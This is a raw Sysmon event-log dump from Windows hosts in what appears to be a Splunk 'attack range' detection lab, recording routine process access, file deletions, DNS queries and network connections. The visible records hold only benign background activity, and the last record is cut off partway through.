12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044253Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044252Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044251Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044250Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044249Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044248Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044247Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044246Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044245Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044244Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044243Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044242Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044241Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044240Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044239Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044238Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044237Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044236Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044235Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044234Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044233Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044232Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044231Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.609{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044259Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:44.896{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF17BCE794E8F9A9F96AE0F33907B270,SHA256=15ED07B940D47A09AD62D502F88C97536D7DD105719EC03B0811DFDFA47252C9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017009Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:44.848{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=269C6570E63BDE234C9AAA0CB6BBC694,SHA256=46FB848FD304B9696A1787A791AA0CB85B6EA32118EEADC353FB872542F8306F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000017010Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:45.917{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4822C5DAA578A42A3B08AB062407A2F,SHA256=AE4B9595960BC85029682509E6E3FC3EBF3756C7BC4C6427CADB288F524D704A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044269Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:45.989{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76AC6B50076048615AFDEF947F160FC1,SHA256=A92F56AA5AF9ED6E26AE06813BDA20C28E09F6A5846A95E086646BC277B633CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000044268Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:45.851{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 22542200x800000000000000044267Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.218{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240prod.sumo.prod.webservices.mozgcp.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000044266Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.216{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240prod.sumo.prod.webservices.mozgcp.net034.149.128.2;C:\Program Files\Mozilla Firefox\firefox.exe 354300x800000000000000044265Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.205{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local58938- 354300x800000000000000044264Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.204{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56280- 354300x800000000000000044263Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.201{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-56684- 354300x800000000000000044262Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.171{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local52005-false10.0.0.2ip-10-0-0-2.us-east-2.compute.internal53domain 354300x800000000000000044261Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.171{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56684- 354300x800000000000000044260Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:43.171{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56684-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domain 23542300x800000000000000044270Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:46.669{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\2752s6y5.default-release\cache2\doomed\2450MD5=91FC4634138460E56AAF4247FE4E81E2,SHA256=2447F6E55B447386D7B4ACB2D7AEEED2A9BB51177AB925BCB3128A86B49D10C7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017011Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:47.004{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 